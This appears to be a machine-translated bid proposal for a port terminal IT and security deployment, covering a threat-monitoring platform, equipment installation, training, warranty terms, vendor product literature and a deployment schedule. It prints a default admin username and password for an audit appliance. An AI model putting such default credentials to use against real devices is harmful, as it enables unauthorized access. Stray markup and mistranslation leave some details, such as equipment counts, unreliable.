The big data analysis engine of the network-wide security awareness platform collects raw network traffic through dedicated probedevices and will gradually support the collectionof AF, AC, EPS, SSL and other security devices and hosts as a data source, combined with the cloud threat intelligence database, through multi-dimensional information fusion to achieve event correlation, cross-correlation and heuristic correlation based on attack scenarios, so as to assess the credibility of the security event, the threat level and the risk value. The engine discovers failed hosts and security threats in the network through big data correlation analysis, identifies potential security risks for business and advanced APT attack behaviors, and at the same time realizes the correlation based on attack scenarios to complete effective attack detection and exploited vulnerability detection, and then traces the attack back to the attack, and through graph correlation analysis, all the information of the hacker (IP, Domain, Virus, Hack tools, Hacker's location, Attack methods, Historical Attack Records), restore the entire attack scenario, form the attack story, and help customers better understand, analyze, and forensically verify the entire attack event.

Deep Dive and Assisted Decision Making

Security overview with big screen visibility

Security Overview abandons the traditional SOC and network management platform's one-size-fits-all network topology display, and innovatively adopts a display method for key business assets and business logic relationship networks:

Security Overview View: You can see at a glance the security risk status of information assets across the network, the logical relationship between the network and the abnormal access behavior, as well as the path and scope of influence of suspicious attacks, realizing the needs of network and security managers to quickly understand the network security posture.

For leaders and decision makers concerned about the overall posture of information security through network-wide attack monitoring,branch supervision, risk, risk, and risk. "3">Branch Supervision, RiskOutreach Monitoring, and many other different perspectives on the big screen display,Provides cockpit-style decision support services for information security executives:

Visualization of network-wide attack monitoring: Attack posture map can present the geographical distribution of attacks and outreach, as well as the ranking of various attacks; security managers can effectively set up external black and white lists to reduce the risk of business capture through the geographic distribution of attackers, combined with their own business and user characteristics.

Branch Supervision Visualization:Network situational monitoring of comprehensive security information across the network,supporting logical topology hierarchy, from the overall security posture of the whole network to the monitoring of information assets and security data,realizingall-around visualization and regulation.

Risky Outreach Monitoring Visualization:Outreach from compromised businesses and users is an important feature of data theft and hacking,Through the visual monitoring of outreach risk, it is possible to clearly see the business application that initiated the outreach access, the destination of the outreach, the application, the time of the outreach, the frequency of the outreach, and other information.

Lurking Threats Goldeneye

Security Perception System, as a detection and analysis class platform, also provides security analysts with professional event analysis aids, namely, Latent Threat Goldeneye, which provides fast query services based on IP addresses, analysts only need to enter the IP address to be analyzed, and the Goldeneye platform can be used to analyze the data based onpowerful background big data analysis and and correlation retrieval capabilities,providing analysts with security threat based onIP view analytics, including:

You can mine assets and business flows associated with specific IPs through automatic correlation analysis, and mine and analyze violations, abnormal behaviors and suspicious attacks;

Provides a tree-like business access and attack process relational network based on query IPs as root nodes;

Based on any node in the relational network, double-click to quickly drill down and analyze, digging deeper into the traces of the attack process, and intuitively understanding the causes and consequences of the entire security incident;

Provide the correlation display of the original logs, you can view the logs related to specific nodes and access paths at any time according to your needs, which is convenient for analysts to locate and analyze security issues.

Server Installation Program

1. Preparation of equipment list: Before starting the construction, it is necessary to prepare servers, racks, network switches, power supply equipment, network cabling materials, cable management components and so on.

Prepare tools and installation accessories.

Install a protective ground wire to ensure that the chassis ground is connected directly to the server room grounding strip or cabinet grounding point.

Install the network cables and ensure that connectivity is tested with a network cable tester before tying the cables.

Install fiber optics and ensure that the fiber optics and fiber optic patch cords meet the requirements before use.

Install the cables on the router, making sure that the cables are routed along the chassis' cable runners, plugged into the connectors on the daughter card and tighten the anti-dislodgement screws with a Phillips screwdriver.

Pre-power-up inspection, including cabinet electrical connection check, installation environment check, and cabinet installation check.

Power-up check to ensure that the input voltage is within the normal voltage range before powering up the device

2. Network Configuration: Pay special attention to the setting of network parameters such as IP address, subnet mask, default gateway and DNS service. At the same time, consider the network security configuration of the server, such as firewall rules and VPN settings.

Complete the installation and configuration of the operating system, including network configuration, administrator account setup, and security settings.

Install the necessary patches and drivers to keep the server running properly.

Configure the switch, including VLAN segmentation, STP configuration, and so on.

Configure network security devices, including security policies, firewall rules, etc.

Perform system testing to ensure that all equipment is functioning properly and network connections are stable.

3. Server monitoring and management: Choose appropriate monitoring tools and techniques, such as system log analysis, performance metrics monitoring, and anomaly detection.

4. Security measures: use strong password policies, restrict unnecessary service ports, configure security updates and patch management, and implement access control policies.

caveat

Power Requirements: Use a power supply that meets safe voltage requirements, and check that the power supply is correct before operating the equipment.

Use of environmental requirements: avoid installing the equipment in direct sunlight or near the heat source, keep the equipment placed horizontally and leave enough space around it to facilitate air evacuation and heat dissipation.

Working environment: Pay attention to environmental factors such as temperature, humidity and altitude.

Cable requirements: the installation of cables should be consistent with the original vehicle cable direction, along the original vehicle cable installation, and the original vehicle cable tie fixed, to achieve neat wiring, hidden.

Routine Maintenance: Avoid using the product by exposing it to working conditions other than those shown in the user manual, and prevent the equipment from being dropped from a high place or subjected to strong knocks.

Wireless Vehicle Mount Terminal Installation Program

Solutions for installation on port collection trucks, RTGs, QCs

1. Determine the appropriate location: determine the appropriate installation location in the vehicle, generally recommended to choose the front of the vehicle, so that the antenna directly facing the sky, receiving signals better.

QC/RTG/RMGInstallation solution:Add between the bracket and the terminal Universal joint connection to adjust the angleand extend the terminal outward distance.

VMT Installation Program

2. Mounting the antenna: Place the antenna on top of the vehicle and secure it with tape or screws. Make sure the antenna is centered and does not overlap vehicle seams or other obstacles.

3. Installation of equipment: choose a suitable location to install the equipment in the car, generally recommended to choose the windshield or the car equipment bracket area. At the same time, pay attention to avoid the driver's operation area.

4. Connecting the power supply: Before connecting the power supply, please be sure to read the instruction manual of the vehicle-mounted terminal carefully and follow the instructions.

caveat

1. Power supply: Strictly observe the electrical safety regulations of the place of use. Please use a power supply that meets the safety voltage requirements, and check whether the power supply is correct before the equipment is operated.

2. Use of environmental requirements: Do not install the equipment in places such as humid, dusty, extremely hot, extremely cold or strong electromagnetic interference.

3. Cable requirements: Wireless network antennas and positioning antennas need to be installed in places with good signals and pay attention to lightning protection, and ensure that there are no objects to cover or block.

4. Routine maintenance: If the equipment is not working properly, contact the manufacturer or the nearest service center. Do not disassemble or modify the equipment in any way at will.

Training programs

Technical training program for personnel

For our company, if we can make the project's management personnel skillful in mastering the CTOS system supporting equipment, the pressure of maintenance in the later stage will be reduced accordingly, and also make the conception of the pre-design program and the effect of the mid-term engineering construction to be a perfect embodiment.

Training will include two parts, one is the course training; the other part is the site operation training (including software and equipment), all of these trainings are provided free of charge, we will develop a systematic and detailed training program to ensure that Party A comprehensive and systematic mastery of the entire CTOS supporting equipment system. Correct and safe operation and effective maintenance of the system.

On-site training: The training is aimed at system operators; it covers the use of the product, system optimization, common troubleshooting and troubleshooting, and routine maintenance of each system.

Certified Training: The content of certified training is the installation, debugging, configuration and optimization of the product to achieve proficiency in the product. Carry out performance tuning, configure performance parameters, and how to diagnose the corresponding faults and so on.

TrainingMaterials and Faculty

We will provide training materials and relevant technical information to the staff concerned who receive relevant training. We will provide before the start of the training, the training materials include equipment operation manuals, maintenance manuals, user guides for each system, software maintenance manuals and some other necessary technical information. All technical materials will be provided in English. All training materials shall be deemed to be our property, submitted in a format (e.g. Word, Excel, etc.) and form duly approved by us and can be easily reproduced.

Our company guarantees that the instructors dispatched for the training courses are senior engineers with sufficient technology and experience, as well as the qualification certificates of engineers certified for the corresponding products. They will be involved in the design and installation of the project. Their names and positions will be submitted to Party A for approval along with the training program.

Training Venue and Facilities

Training courses for both course training and on-site operation training will be arranged on site, and Party A will provide the necessary basic training facilities, such as training site, blackboard, power supply, podium, etc., and the projector and other instruments and equipments needed for training will be prepared by us.

Training content

Training Arrangements

intend

In order to scientifically do a good job of training, understanding the current situation of the user is very necessary preparation, for which my company specially asked customers to fill out the basic situation of the training staff questionnaire. The questionnaire will be used as the basis for the training curriculum, class schedule.

Scheduled training time: specifically according to Party A's requirements.

TrainingObject

We will train a number of technicians for us free of charge. The personnel can be according to our requirements.

Classes are scheduled for two classes in the morning and two classes in the afternoon, with breaks in between according to the actual training situation. The total training time is 10 days.

Training Programs

Training organization, implementation and management

Based on the developed and approved training plan, a specific implementation plan is formulated, including the names and units of specific trainers, the identification of training materials, the identification of lecturers, and the implementation of lecture venues.

Training Lecturers

The training instructors sent by us have both long-term experience in system design, operation and maintenance, as well as rich experience in training and counseling.

Training Commitment

1) Free training for Party A's engineers and technicians and management personnel on technologies related to the project.

2) Training according to the system involved in this project to carry out independent training, each training shall fill in the "training records".

3) The number of on-site trainers can be unlimited, and the time is determined according to Party A's requirements and actual needs.

4) The number of on-site trainings can be unlimited and will be conducted according to Party A's requirements.

Training materials

Prior to the commencement of the training, we provide us with all training materials in English free of charge, including:

1) System design solution.

2) Systematic training materials.

3) Product manuals for the products used in the system.

4) System Operation Manual.

5) System Maintenance Manual.

Training Methods

1) The multimedia teaching method is adopted, and the training equipments include projector, physical display table and so on. It is also accompanied by the necessary practical exercises.

2) The teaching method combines the popularization of basic theories with practical operation, and combines centralized lectures with individual counseling.

3) Training audio-visual teaching aids, equipment to determine: the use of teaching materials are mainly to the product and the software comes with the manuals and the corresponding operation of the document is based on the teaching place for the project implementation site, teaching equipment can be all the equipment for the system integration.

4) Management of Specific Training Processes: In order to strengthen the management and to improve the quality of the training, the participants in the training should obey the guidance of the training teachers, and at the same time, the management of the information department should give the training teacher enough management power to ensure that the daily teaching content can be implemented.

Aftermarket Programs

I. Project after-sales service content commitment

The company carries out the tenet of "honesty and integrity, customer achievement, self-improvement, the pursuit of excellence", for the projects that have been completed and accepted for quality tracking services, and in the spirit of technical excellence, dedicating first-class technology and first-class maintenance services to users.

If the company undertakes the project, it will strictly follow the provisions of the bid and the contract to provide the owner with the responsibilities and obligations of this project during the warranty period. After the warranty period, considering the continuity of equipment maintenance, it is recommended that the owner sign a maintenance contract with the company to ensure the technical and management support necessary for the normal operation of this system project.

The overall warranty for this project is 1 year, and the server meets the 3-year global warranty.

II. After-sales service period

On the date of acceptance of the project, the after-sales service period is entered.

After-sales service period = quality assurance period + quality maintenance period

Quality guarantee period: During the quality guarantee period, if the failure is caused by quality problems, free replacement of equipment, components and materials will be implemented. If the failure is caused by non-quality factors, the cost of replacement equipment, components and materials will be charged.

Quality maintenance period: After the quality assurance period, the quality maintenance period is self-executing.

Company to undertake project provide no higher than the unit price of the equipment in this contract to provide the required replacement of components and materials at a preferential price, in addition to the cost of the maintenance personnel.

III. Services and warranty period

On the date of acceptance of the project, the after-sales service work will start, including the following aspects:

1. Maintenance staff;

2. After-sales service period;

3. Service response time;

4. After-sales service programs.

IV. Commitment to concrete measures

1, first of all in the signing of the project contract at the same time with the customer signed after-sales service guarantee agreement, to exclude the customer's worries, the customer to make a realistic and objective commitment.

2, the project has been accepted and delivered to the user, in the contract period with the user to contact, record the use of the user, the system operating conditions, such as quality tracking survey, change the passive service to active service.

3、Establish system operation files for projects that have been handed over and carry out quality tracking.

4. The system operation file records the operation of its projects, the use of various types of equipment, the level of operation of operators and the movement of personnel.

5、Aiming at the representative problems appeared by the operators of each user unit, we will conduct technical training for the operators or go to the site for training and guidance on a regular basis.

6, being used in the system, equipment failure, the company's maintenance service personnel received a report in time to go to the scene to deal with, repair.

7, for the operation of the project for a long time, the company's maintenance service personnel regularly contact with customers to ask about the situation, regularly to the customer side of the inspection, inspection, and make records, records are filed and preserved.

8. Construction Assurance

Technicians with rich experience will be selected to be responsible for the specific construction of the project to ensure the quality of the installation and the use of the system function, and to ensure that the whole system runs smoothly, efficiently and reliably.

9. System warranty

As the project contractor, we will strictly follow the provisions of the bidding documents and the contract to provide the owner with free maintenance within the warranty period from the date of final acceptance of the project.

10, the warranty period of equipment damage, identified as the equipment itself causes failure, we are responsible for free repair or replacement; at the same time is responsible for the warranty period on a regular basis to provide maintenance and repair services for the equipment.

In short, in order to make the owners use assured, easy to use, to ensure the normal operation of the project, the company's entire technical and maintenance staff in line with the principle of customer first, wholeheartedly for the sake of customers, go all out for the work, let us work together to create a better tomorrow and work hard.

V. System maintenance

1. System operation and management

In order to ensure that the system can operate normally for a long time, we will carry out perfect system training, and at the same time develop the operating procedures of each system project, and cooperate with the owner to develop the operator's responsibility interface and reasonable handover system.

2. System maintenance

Our after-sales service personnel will service your system items during the maintenance period to keep them in good operating condition.

3. Monthly maintenance

Adherence to monthly maintenance ensures that each system project's mechanical devices are kept in optimal working condition.

VI. Content and scope of warranty services

The Company will provide a warranty for each project undertaken, valid from the date of acceptance of the project and the Owner's signature on the completion report.

1. Response time: The specific response time will be divided by fault level;

2. Maintenance location: user site.

Our company is responsible for the implementation of all system projects, in the normal environment to do the appropriate use of the failure, our company will provide agreed warranty services. For non-current failures, our company will arrange to provide the service, but will need to be charged separately according to the fee schedule.

Our warranty service is limited to products that are qualified by us. Non-conforming products include products not supplied by us, products not recognized as conforming by us, and products for which the customer does not allow us to make functional improvements.

System damage that occurs under the following conditions is not covered by warranty service:

a. Damage to system equipment caused by the use of inappropriate tools for system maintenance;

b. The site environment does not comply with the specifications recommended by our company;

c. Accidents, natural disasters, negligence and misuse, war, strikes, lightning strikes or power failures, damages caused by improper handling by the customer, modifications and changes made to the system by persons other than our personnel or their authorized subcontractors;

d. How the equipment is maintained and information is processed.

VII. Maintenance and service support measures

1、On-site troubleshooting or technical guidance

After receiving the owner's telephone support service request, if we can not solve the technical faults of the equipment or products through telephone support service, and if the need for on-site support is confirmed by both parties, we will send professional project technicians to the site in time to assist the owner to solve the faults.

2. Telephone support services

The telephone helpline number shall be the one provided by us to the Owner (including telephone and fax numbers). In case of change, we shall notify the Owner by e-mail, fax or telephone at least 3 days from the date of change.

3. Complaint handling services

There is a telephone number for customer complaints in the company.

4. Telephone counseling services

We provide telephone consulting services for non-faulty problems arising from the owner's use of the equipment or products.

Setting up quality pre-sale and after-sale services in engineering projects to maximize the satisfaction of customers' needs and expectations is one of the important management tools for an enterprise to achieve long-term stable development in many industries.

Technical Literature

CTOS server(C6620)

CTOS access switch (S5731-S48T4X)

RDT Handheld (CK65)

RTG/RMG Terminal (8312)

VMT (4108)

Operations and maintenance audit system (DAS-USM280)

Product Introduction

DAS-USM is a unified security management and audit product, which is classified into hardware version and cloud version. The functions of the two versions are basically the same, and users can purchase them according to their needs. The product integrates the functions of authentication, account and authorization and audit. It supports the security monitoring and historical query of multiple character terminal protocols, file transfer protocols, graphic terminal protocols and remote application protocols. It has the capability of comprehensive operation and maintenance risk control, and can meet the requirements of various laws and regulations (such as hierarchical protection, SOX, PCI, enterprise internal control management, hierarchical protection, ISO/IEC 27001, etc.) for operation and maintenance audit.

The main functions of DAS-USM are as follow.

Typical Application Scenarios

DAS-USM bypass is deployed on the core switch so that when operators perform operation (including SSH, Telnet, FTP, RDP, VNC, Oracle, DB2, MySQL, SQL Server, and other operation protocols), they can directly connect to the assets using local terminal operation tools for secure operation. Through network-level configuration (e.g., policy routing, ACL policies), operators are restricted to access Linux hosts and Windows hosts only through DAS-USM. DAS-USM is capable of auditing operations of operators.

Role & Permission

There are 9 different roles built into the system by default, and users can also customize roles through the role management function. Please refer to the following table for the permissions of users with different roles ("√" means support and "-" means not supported). The operation of this article is illustrated by the example of Super Administrator.

Login to Device

The super administrator needs to login to the device for function configuration ater the device is installed on the rack and connected with the network cable and power supply. DAS-USM are configured by CLI and web respectively and supports local and remote configuration methods. The CLI supports the mainstream communication management protocols such as Console, Telnet and SSH.

The cloud version only supports web configuration.

Configurate by CLI

Please refer to the following steps to set up the DAS-USM console port configuration environment:

Please provide your own configuration cable and connect the USB plug of the configuration cable with the USB of the PC.

Connect the RJ-45 plug of the configuration cable with the console port of the device.

Run the terminal simulation program (such as PuTTY, SecureCRT, etc.) on the PC, and set the parameters as shown in the table below.

Turn on the power switch and the device will carry out self-test and automatic initialization configuration. The following login prompt will pop-up if the system starts successfully.

Enter the default user name and press enter after the login prompt and then enter the default password and press enter. After that, you can login to the CLI configuration interface of the system.

Configurate by Web

This paper only uses the hardware version as an example. The cloud version needs to ensure that the routing of PC and DAS-USM can be reached.

The administrator can log in to the web management platform of the device for configuration. The specific methods are as follows:

S1 Set the IP address of PC to the IP address of 172.16.1.2/24 in the same network segment, and connect the Ethernet interface of PC and equipment with network cable.

S2 Enter “https://172.16.1.2” in the address bar of PC browser (Chrome 69 and above or IE 11 and above are recommended) and press enter to access the web management platform login page.

S3 Enter the default user name and password, then click <Login> to login to the main interface of the web management platform of the device.

The default management port address is 172.16.1.2/24, and the default administrator user name is admin and password is sysAdm@169+- Please change your password after login.

Main Business Process

The system main business process is as following picture.

Create department: Super administrator or department administrator creates department. Please refer to 4.1 Create Department for details.

Create users: create system users, including operation and maintenance personnel. Please refer to 5.1.1 Create User for details.

Create host: The system can audit the operation of the host after adding the host to the system. See 6.1 Host Management for details.

Establish operation and maintenance rules: authorized Operator can log in to the host for operation and maintenance. Please refer to 7.1 operation Rules for details.

Create operation rules: authorized Operator to login to the host for operation. Please refer to 7.1 operation and Maintenance Rules for details.

aintenance of the host by the operator: the operator login the host in the system and maintains the host. Please refer to 10.1 Host operation for details.

The auditors audit the operation of the host: the auditors audit the session. Please refer to 8.1 Session Audit for details.

operation video data archiving configuration: Archive session video. Please refer to 12.5.1 Data Archiving for details.

Network Security Situational Awareness Platform (SIP-1000-B3400-SR+STA-100-B2300-SR)

WAF Firewall (WAF-2000-FH2150A-SR)

Introduction

Sangfor Network Secure is endowed with the capabilities of risk prediction, deep security protection, and detection response, forming an integrated security system with whole-process protection and visibility.

Fusion is not a simple function superposition, but integration of technical security means provided for the risks encountered in the service development process. It provides whole-process protection for the service. Fusion security involves pre-event asset risk identification and policy effectiveness detection, while-event security defense means that should be provided, and post-event continuous detection and rapid response mechanism. Meanwhile, all related information of this process is presented to users in different ways.

Key Features

I. Preparation & Prediction: Asset/Vulnerability/Policy Effectiveness

Network Secure can automatically identify risks such as open ports, vulnerabilities, and weak passwords on internal servers in advance, and can judge whether the identified assets have corresponding security protection policies and whether the policies are effective.

II. Real-Time Defense: Complete Defense System + Security Correlation + Threat Intelligence

Network Secure integrates a number of security technologies for effective defense during an event. It provides a complete security defense system (L2-L7) to ensure that there are no weaknesses in security protection. At the same time, Network Secure can also improve the timeliness and effectiveness of the defense system through security integration, including the integration of cloud and endpoint security solutions, and the coordination of different modules. In addition, Network Secure also cooperates with third-party security agencies, and utilizes threat intelligence from multiple sources, such as the Chinese National Vulnerability Database, VirusTotal, and malicious URL databases to help users prepare for defense before security events occur.

III. Post-event Detection & Response: Continuous Detection of Threatening Behaviors and Rapid Response

Traditional security work mainly focuses on border security defense, and lacks the ability to detect and respond when attackers bypass security defense measures. If there are mature post-event detection and response measures, the impact of security events can be greatly reduced. Network Secure integrates post-event detection and rapid response technologies, which help users timely discover malicious behaviors even after hacking, such as detecting malicious behaviors initiated by zombie computers, webpage tampering, website backlink embedment, and Webshell backdoor, and quickly push alarm events to assist users in responding and handling.

Load balancing equipment (AD-1000-B1800-SR)

Firewall (USG6615F)

Business system core switch (S12700E-4)

Construction schedule planning

Project plan for the installation and deployment of equipment in the server room (45days)

Project Overview

This project aims to complete26TaiwaneseDLT-V8312,35TaiwanDLT-V4108< span data-dl-uid="8">Wireless Vehicle Mount Terminal, and 2 servers,6 servers. span>Tai switch and other equipment in the server room shelves deployment and coordination. The project period is 45days, and it is required to complete the installation and debugging of all the equipments and ensure the normal operation of the system in the specified time.

Project Objectives

Equipment Installation:Complete physical installation of all equipment as scheduled to ensure equipment is properly located and wiring is standardized.

Device Deployment:Completes the system configuration of the device, including IPaddress assignment, routing configuration, firewall configuration, and so on.

Intermodulation Test:Intermodulation test for all devices to ensure network interoperability and normal system functions.

System Acceptance:Organize the relevant personnel to carry out the system acceptance, to ensure that the system meets the design requirements.

ConstructionScope

Device Scope:Includes all listed on-board terminals, servers, switches, operation and maintenance audits, load balancing, core switches, access switches, firewalls, network security situational awareness platform.

Scope of Work:Includes handling, installation, commissioning, configuration, intermodulation, testing, acceptance of equipment.

Site Scope:Primary and backup server rooms and equipment installation areas.

Project schedule

Project resources

officers:

Project Manager: Responsible for the planning, implementation and monitoring of the entire project, coordinating the resources of all parties to ensure that the project is completed on time and achieves the expected results.

Equipment Engineer: Responsible for equipment selection, configuration and debugging to ensure the compatibility and performance optimization of the wireless trailer terminalsVMTwith the servers of the server room.

Network Engineer: Responsible for network architecture design and implementation, ensuring the stability and security of network connections, configuring equipment such as routers, switches and firewalls.

Test Engineer: Responsible for comprehensive testing of the system, including functional testing, performance testing and security testing, to ensure the stability and reliability of the system.

Operation and maintenance personnel: responsible for the daily maintenance and monitoring of the project after going online, dealing with unexpected failures to ensure the normal operation of the system.

installations:

Wireless Trailer Terminal VMT: Main device for wireless data transmission and control.

Server room servers: core equipment that carries data processing and storage, ensuring data security and reliability.

Network equipment: network security equipment, access switches, core switches, firewalls, load balancing, security operation and maintenance audit, network situational awareness, etc.

mounting tool

Network testing tools (e.g., cable tester),Installation tools (e.g., drill, wrench),server monitoring software

risk management

In the wireless trailer terminal VMT and server room server installation project, one of the keys to ensure the smooth running of the project is the prevention of potential failures and quick response. First, to address the issue of equipment failure, the project team must have all types of spare parts, including wireless modules, power adapters, network cables, etc., to deal with possible equipment failures. Equipment will inevitably experience wear and tear or technical failures over a long period of time, so regular equipment inspections are necessary. Inspection work should include a number of indicators of the equipment operating status, connection stability, temperature monitoring, etc., through these measures can be early detection and resolution of hidden problems, reducing the impact of equipmentfailure of equipment on the project schedule. In addition, a contingency plan is in place to ensure that when equipment problems occur, replacement parts can be found and replaced quickly to minimize downtime and keep the project moving forward.

Second, schedule delays are also an important risk factor in project management. In order to effectively address this issue, project teams should develop a detailed schedule plan that breaks down project tasks into small, concrete, executable steps with clear timelines for each step. The progress plan should include milestones for each phase to ensure that the team completes its respective work within the specified time. At the same time, it is crucial to strengthen communication and coordination. The project manager needs to organize regular project progress meetings, inviting all relevant personnel to participate and discuss project progress, problems and solutions. Through such a communication mechanism, team members are able to keep abreast of the overall progress of the project and are able to coordinate quickly when problems are encountered, avoiding delays caused by poor information. In addition, by utilizing project management tools, progress can be tracked in real time to ensure that each task is carried out according to plan, and adjustments can be made when necessary to ensure that the project can be completed within the scheduled time.

Finally, the occurrence of network failures may have a serious impact on the operation of the whole system. Therefore, it is very important to establish a perfect network monitoring system. The project team should set up network monitoring tools to monitor network traffic, latency, packet loss rate and other key indicators in real time, so as to discover network anomalies in a timely manner. Through the network monitoring system, the root cause of the failure can be quickly identified, which facilitates the technical team to take rapid measures to repair the problem and avoid data transmission interruption or business stagnation caused by network failure. At the same time, the team should also carry out regular maintenance of network equipment, updating firmware and software to ensure that network equipment operates in the latest state. In addition, network redundancy design, such as the installation of backup links, can quickly switch to the backup network in the event of a primary network failure, thus improving system reliability and stability.

By preparing spare parts and strengthening inspections, making detailed schedule plans and enhancing communication, and establishing a perfect network monitoring system, the project team was able to effectively reduce the impact of equipment failures, schedule delays, and network failures on the project, thus ensuring that the installation of the VMT for the wireless trailer terminals and the servers in the server room could go smoothly, and ultimately realizing a successful landing of the project.

quality assurance (QA)

In the installation project of equipment such as wireless trailer terminal VMT and server room servers, the implementation of standardized operations is the basis for ensuring the success of the project. Project teams must strictly follow the installation manuals and operating instructions provided by the equipment manufacturers to ensure that each step meets the required standards. In this way, human error can be minimized and the accuracy and safety of the installation can be improved. In addition, standardized operations provide teams with consistent operating procedures, allowing new members to get up to speed quickly and reducing training costs.

Documentation management is equally critical. After the installation of the equipment is completed, the project team needs to record the configuration information of the equipment in detail, including the model number, serial number, installation location, network settings and so on. This information not only provides an important basis for later maintenance, but also helps to quickly locate the problem when the equipment fails. Documentation should be managed electronically for easy access and updating, while ensuring that all relevant personnel have easy access to the latest configuration information. In addition, regular review and updating of documents to ensure the accuracy and completeness of information is also part of document management.

In the system testing phase, comprehensive testing with professional testing tools is a key part to ensure stable system operation. The team should conduct system testing for different functional modules, including performance testing, stress testing and security testing. Through professional testing tools, the system's operation status can be accurately assessed, and potential problems can be found and solved in time. For example, the use of network monitoring tools can detect network latency, bandwidth occupation and other indicators in real time to ensure the stability of data transmission. Meanwhile, performance testing can help assess the performance of the system under high load conditions to ensure that it can withstand the expected pressure in actual operation. All test results should be recorded in detail and reviewed when necessary to ensure continuous improvement and optimization of the system.

Standardized operation, document management and test verification complement each other to ensure the smooth progress of the wireless trailer terminal VMT and server installation project in the server room. Through these measures, the project team was able to ensure the correct installation and configuration of the equipment, improve the efficiency of post maintenance, ensure the long-term stable operation of the system, and lay a solid foundation for the success of the project.

communication and coordination

Regular MeetingsRegular project meetings are held to inform the progress of the project and solve problems.

Communication ChannelsEstablishing open communication channels for timely feedback.

Project acceptance

 
In the wireless trailer terminal VMT and server room server installation project, the development of acceptance criteria and content is an important part of ensuring the quality of project delivery. First, acceptance criteria should be developed based on project requirements and design documents, with clear indicators and requirements. Project requirements usually cover specific customer expectations and usage scenarios, while design documents describe in detail the system architecture, functional modules and performance requirements. On this basis, the project team needs to develop a set of detailed acceptance criteria, including functional acceptance criteria, performance acceptance criteria and security acceptance criteria. These criteria not only provide a quantitative basis for project acceptance, but also ensure that all relevant parties have a common understanding of the project outcomes.

In terms of acceptance content, the first focus needs to be on checking that the equipment installation meets the requirements. This includes a review of the equipment's physical location, connections and safety specifications. The equipment should be installed in accordance with the specific location in the design documents, and ensure that all connections are strong and reliable. The connections of the power supply, network interface, signal receiver and other parts of the equipment also need to be checked in detail to ensure the stability and safety of the equipment in actual operation. If any non-compliance is found, it should be recorded and rectified in time to ensure that the final delivered equipment meets the design standards.

Secondly, the completeness of the system functionality is also an important element of acceptance. The project team needs to test all functional modules one by one to ensure that they operate normally and can meet the project requirements. This includes the basic functions of the wireless trailer terminal, the accuracy of data transmission, and the compatibility of the system interface. The team also needs to verify the effectiveness of the system's functions in actual operation, such as whether the user rights management, data processing flow and alarm mechanism work properly. Functional tests should cover all usage scenarios to ensure that the system can meet the actual needs of users.

Finally, the performance acceptance criteria should not be ignored. The project team should evaluate the performance of the system, including such indicators as response time, data processing capacity and the number of concurrent users. Through load testing and stress testing, a highly concurrent environment can be simulated to ensure that the system can still run stably under high load. For example, it is tested whether the response time of the system under peak utilization meets the preset standards and whether the data transmission rate meets the requirements. In addition, the security performance of the system needs to be verified to ensure the security of data transmission and the system's ability to protect against potential threats.

Through rigorous audits of equipment installation, system functionality and performance, the project team was able to ensure that the final delivery of the system met the design requirements and customer expectations, laying a solid foundation for subsequent system operation and maintenance.